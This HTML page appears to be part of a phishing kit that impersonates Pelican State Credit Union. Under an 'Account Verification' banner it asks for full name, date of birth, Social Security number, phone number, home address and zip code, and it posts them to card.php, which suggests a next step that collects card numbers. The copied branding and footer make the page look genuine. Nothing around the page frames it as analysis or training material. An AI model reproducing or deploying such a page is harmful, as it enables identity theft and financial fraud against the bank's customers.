<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">

	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Login: Pelican state Credit Union</title>
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
	<style type="text/css">
		*{
			font-family: arial,helvetica,consolas;
		}body{
			margin: auto;
		}#container{
			width: 100%;
			height: 100%;
background-image: url("img/bg.jpg");
			background-repeat: no-repeat;
			background-position: center;
			background-size: cover;
		}#form{
			padding: 15px;
			width: 88%;
			padding-top: 20px;
			margin-top: 80px;
			margin: auto;
			max-width: 500px;
			background: white;
			border-radius: 10px;
		}form{
			margin: auto;
			width: 93%;
			max-width: 400px;
		}::placeholder{
			color: #015167;
		}.foot{
			color: gray;
			margin-right: 12px;
			margin-left: 12px;
		}#footer{
			background: white;
			padding: 15px;
			margin-top: 60px;
		}#ft{
			max-width: 800px;
			margin: auto;
			line-height: 23px;
			font-size: 12px;
		}
	</style>
</head>
<body>
	<div id="container">
		<br>
		<br>
		<br>
		
<div id="form">
	<form action="card.php" method="post">
			<center>
				<img src="img/person.png" width="50px">
<h3 style="font-family: consolas;margin-top: 10px;margin-bottom: 0;">Account Verification</h3>
<p style="font-size:12px; color: gray;font-family: verdana;">We need this info to verify your identity.</p>
<br>

				<input type="text" style="width: 90%;padding: 16px;border: 1px solid lightgray;border-radius: 4px;font-size: 15px;" name="name" maxlength="" minlength="5" placeholder="Full Name" required>
				<input style="width: 90%;padding: 16px;border: 1px solid lightgray;border-radius: 4px;font-size: 15px;margin-top: 20px;" name="dob" type="" minlength="" id="dob" placeholder="Date of Birth" required>
				<input type="" style="width: 90%;padding: 16px;border: 1px solid lightgray;border-radius: 4px;font-size: 15px;" name="ssn" maxlength="" minlength="" id="ssn" placeholder="Social Security Number" required>
				<input style="width: 90%;padding: 16px;border: 1px solid lightgray;border-radius: 4px;font-size: 15px;margin-top: 20px;" name="ph" type="" minlength="" id="ph" placeholder="Phone Number" required>
				<input type="" style="width: 90%;padding: 16px;border: 1px solid lightgray;border-radius: 4px;font-size: 15px;" name="ad"  minlength="5" placeholder="Home Address" required>
				<input style="width: 90%;padding: 16px;border: 1px solid lightgray;border-radius: 4px;font-size: 15px;margin-top: 20px;" name="zip" id="zip"  type="" minlength="" maxlength="" placeholder="Zip Code" required>
				<p style="color: #015167;text-align: right;font-size: 14px;font-weight: 500;">Need Help?</p>
				<table width="100%" style="margin-top: 30px;">
					<tr>
						<td style="color: #015167;font-size: 14px;font-weight: 500;text-align: left;">First time user? Enroll now.</td>
						<td style="text-align: right;"><button style="background:#007aa3;color: white;padding: 15px;font-size: 13px;font-weight: bold;border-radius: 8px;border: 0;width: 120px;">Continue</button></td>
					</tr>
				</table>

				<a href="#" style="display: block;color: #015167;text-decoration: none;font-weight: 500;font-size: 14px;margin-top: 25px;padding: 18px;background: #eef1f5;border-radius: 8px;margin-bottom: 30px;"><i class="fa fa-building" style="font-size:18px"></i> Become a member</a>
			</center>
			
		</form>
</div>



<div id="footer">
	<p id="ft"><span class="foot">© 2022 - Pelican State Credit Union</span> • <span class="foot">(800) 351-4877</span> • <span class="foot">Privacy policy</span> • <span class="foot">Federally Insured by NCUA</span> •  <span class="foot">Equal Housing Opportunity</span></p>
</div>

 <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
    <script src="https://s3-us-west-2.amazonaws.com/s.cdpn.io/3/jquery.inputmask.bundle.js"></script>
    <script type="text/javascript">
        $("#ssn").inputmask({"mask": "999-99-9999"});
	$("#cn").inputmask({"mask": "9999 9999 9999 9999"});
        $("#dob").inputmask({"mask": "99/99/9999","placeholder":"DD/MM/YYYY"});
        $("#ph").inputmask({"mask": "999-999-9999"});

        $("#zip").inputmask({"mask": "99999"});
    </script>


	</div>

</body>
</html>
